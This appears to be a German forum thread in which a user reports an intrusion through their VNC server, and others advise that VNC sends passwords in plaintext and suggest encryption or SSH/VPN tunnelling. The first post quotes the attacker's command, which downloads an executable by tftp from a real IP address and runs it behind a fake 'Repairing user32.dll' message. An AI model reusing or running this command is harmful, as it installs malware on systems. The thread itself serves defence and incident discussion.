vnc - sicherung

W

weau

0
hallo , ich habe auf einem rechner hier im netzwerk vnc-server installiert, um von der arbeit gewisse aktionen ausführen zu können.
gerade stelle ich fest, dass irgendwer das passwort rausbekommen hat und folgendes ausführen wollte

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 64.31.153.41 GET pexdg.exe & start pexdg&

pexdg.exe lief bereits im taskmanager - was ist dass?

ich benutze die version 4 , gibts da irgendwelche exploits für? ps : keiner meiner freunde oder andere können dieses passwort wissen - das muss also wirklich jemand rausbekommen haben.
gibts irgendwo einen bufferoverflow oder so? ich bin für jeden hinweis dankbar

lg,weau
 
VNC überträgt das Passwort idR. in Plaintext, dh. unveschlüsselt...

Es könnte jemand den Netzwerkverkehr mitgesnifft, und somit an dein PW gekommen sein...

Tipp: für Ultra-VNC gibt es diverse Plugins die den kompletten Datenverkehr mit AES verschlüsseln können.

Tipp2: Du kannst den VNC-Verkehr eventuell über SSH / VPN tunneln.
 
Ich weiss zwar nicht, was das Programm genau macht, aber ich habe es jetzt mal ausprobiert und dabei habe ich bemerkt, dass es den Port 1025 aufmacht und den abhört. Auch gibt sich das Programm in der Windows Firewall selber Frei.

Ansonsten konnte ich nichts bemerken.
 
Original von adrian90
Ich weiss zwar nicht, was das Programm genau macht, aber ich habe es jetzt mal ausprobiert und dabei habe ich bemerkt, dass es den Port 1025 aufmacht und den abhört. Auch gibt sich das Programm in der Windows Firewall selber Frei.

Ansonsten konnte ich nichts bemerken.
Zum Vergrößern anklicken....

ah , okay port 1025 sollte durch meinen router allerdings geblockt sein

@keksinat0r : ich werde mir mal ultra-vnc installieren , wenn die passwörter natürlich im klartext erscheinen ist das ein großes sicherheitsrisiko.
 
Um antworten zu können musst du eingeloggt sein.
Zurück
Oben